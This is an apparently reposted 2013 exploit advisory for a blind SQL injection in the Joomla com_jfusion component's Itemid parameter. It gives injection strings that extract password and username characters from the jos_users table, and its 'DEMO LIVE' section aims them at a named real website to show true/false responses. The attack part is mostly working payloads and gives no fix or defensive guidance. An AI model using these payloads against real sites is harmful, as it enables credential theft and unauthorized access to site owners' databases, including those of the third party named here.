Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability

June 15th, 2013 | | 0 Comments »

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection

###################################################

Example:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]
n:valid Itemid

Sql code:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*

etc, etc…

DEMO LIVE:

http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1

http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97

!False ¡¡¡¡

http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98

¡True ¡¡¡¡

etc, etc….

I let a script that could save this job::example use
Note:
Itemid: valid for the Web
coincidencia : seen in 1 = 1 and not 1 !=

thueserve 728x90 Joomla Component com jfusion (Itemid) Blind SQL injection Vulnerability
Tags: · ·
digg delicious stumbleupon technorati Google live facebook Sphinn Mixx newsvine reddit yahoomyweb